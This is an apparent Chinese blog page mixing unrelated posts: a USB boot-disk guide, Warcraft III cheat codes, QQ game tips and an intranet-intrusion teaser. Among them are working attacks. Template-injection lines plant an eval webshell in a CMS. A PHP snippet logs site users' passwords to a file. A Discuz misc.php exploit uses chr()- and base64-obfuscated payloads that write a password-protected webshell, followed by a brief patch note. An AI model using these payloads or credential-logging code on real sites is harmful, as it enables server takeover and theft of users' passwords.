Chinadu`s Blog

1、下载HP_USB_FW.rar，This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压，执行HPUSBFW.EXE，选FAT32文件系统，快速格式化，要选中创建dos启动 盘，路径指向解压目录下的HPUSBFW目录，这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS，这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

阅读全文...

编辑模板的时候写入这几行,拆开写一句话,就行了:

1. <!--{eval $content = "@eval($_POST[c])";}-->

2. <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->

3. <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->

PS:引用一句俗话：“外行看热闹，内行看门道” 雷死人了。

注意看镜头中的system32目录中dir命令，完全受捕鸟啦，主角太高端啦。

1.输入-ars+开启英雄自动无限重生
同理输入-ars-关闭英雄自动无限重生

开启后 英雄死后会立即在原地复活

2.-uci
一些ID:
stel 传送权杖
stwp 回城
spre 保存权杖
ankh 重生十字架
srrc 复活卷轴
modt 死亡面罩
hbth 战舰之舵(太强了)
gemt 显形宝石
gsou 灵魂宝石(太BT了 最好不要乱用啊 尤其是RPG)
rnsp 残废之球
odef 黑暗之球
ofro 霜冻之球
sora 影子之球
oslo 减速之球
oven 毒液之球
ofir 火焰之球
ocor 腐蚀之球
oli2 都是闪电之球
fgrd 红龙卵
rde1 速度之锤
mlst 力量之锤
sksh 邪恶护盾
flag 胜利旗帜(人类)
nflg 胜利旗帜(暗夜)
oflg 胜利旗帜(兽族)
uflg 胜利旗帜(不死族)
ckng 国王之冠 +20
ratf 无极战斧
rde4 无极护盾
rat6 无极战弓
prvt 无极权杖
evtl 闪避护符
spsh 魔法护盾护身符
3.显示所有玩家信息

输入-list

4.魔免

选定单位
在单位特殊属性菜单设置(也可用删除所有特殊属性去掉)

输入-umm也可开启 删除也可以-umm-

5.加钱

输入-rm 钱数
输入-rw 木头数
如果想减少 空格可以换成-
例子:
加200钱:-rm 200
减50木头:-rw-50

6.升级

选定英雄 按住←→再按↓

输入-hu 级别
比如输入-hu 2 升级2
空格换成-可以减去等级

加力量
(对选中英雄)
1.按键盘↑+←(间隔2s内)

2.输入-hl 数值
(空格换成-可以减去)
例子:
加20力量:-hl 20
减力量5:-hl-5

(对选中英雄)
1.按键盘↑+↓(间隔2s内)

2.输入-hm 数值
(空格换成-可以减去)
例子:
加20敏捷:-hm 20
减敏捷5:-hm-5

加智力
(对选中英雄)
1.按键盘↑+→(间隔2s内)

2.输入-hz 数值
(空格换成-可以减去)
例子:
加20智力:-hz 20
减智力5:-hz-5

加三围
(对选中英雄)
1.按住键盘↑↓再按→

2.输入-ha 数值
(空格换成-可以减去)
例子:
加20三围:-ha 20
减三围5:-ha-5

7.开地图

(只会自己开 不会对盟友共享[盟友看见是正常视野])
1.连按5次↑(2s内)

8.自动清除CD

在自动化菜单设置

输入-acd+开启自动清除CD
同理输入-acd-关闭自动清除CD

内容如下：

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在

阅读全文...

1.注册一个新用户
2.Exp代码如下：

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

来自：digexploit

作者：lcx

这期的专栏是我设定的题目，看够了注入，是不是想了解一下内网的入侵手法呢？做为出题人，自然要写一篇了。在各式各样大小不同的内网中，最常见的就 是域内 网了。其实域内网的入侵和我们平常的入侵手法在总体上来讲的逻辑也是一样，也是信息的收集、分析，找出薄弱点，然后击破，再综合归纳整理，最终拿到域管理 员的密码，算是大功告成。有了内网的第一台机器的权限后，如何收集信息，这是很关键的一步，这篇文章讲的就是域内网信息的收集的第一步。

图1（点击查看大图）

阅读全文...

在每小时的0分-1分钟之间开通，比如：

11：00-11：01

12：00-12：01

以此类推

100%成功！本人亲自测试，100%成功！

大家把握好开通的时间，速度去吧。

老虎花要点朋友送你花的那条消息进入页面（qq消息盒子或者消息管理器里）。在上方会出现领取礼物的盒子。一天好像只可以收到一个。
老虎花是好友赠送的，而且一天只能接受一颗，在好友赠送时你必须QQ上线，在弹出的消息里点进去，这样才能接受。第一次获赠，额外奖励2000欢乐豆，另 外你送好友，如果好友接受，你能奖励50金币。老虎花从播种到开花时间是十分钟。老虎花既不能赠送也不能像其它鲜花那样“偷”，只能出售，产量30朵，每 朵20金币。系统提示从今天开始第一收集到500朵老虎花的前50名玩家，将在一月底获得官方的25CM老虎公仔一个，不过全国这么多人玩，你肯定挤不进前50.如何，够详细吧？
一天能送十个好友老虎花种子,
只能接受好友赠送的一个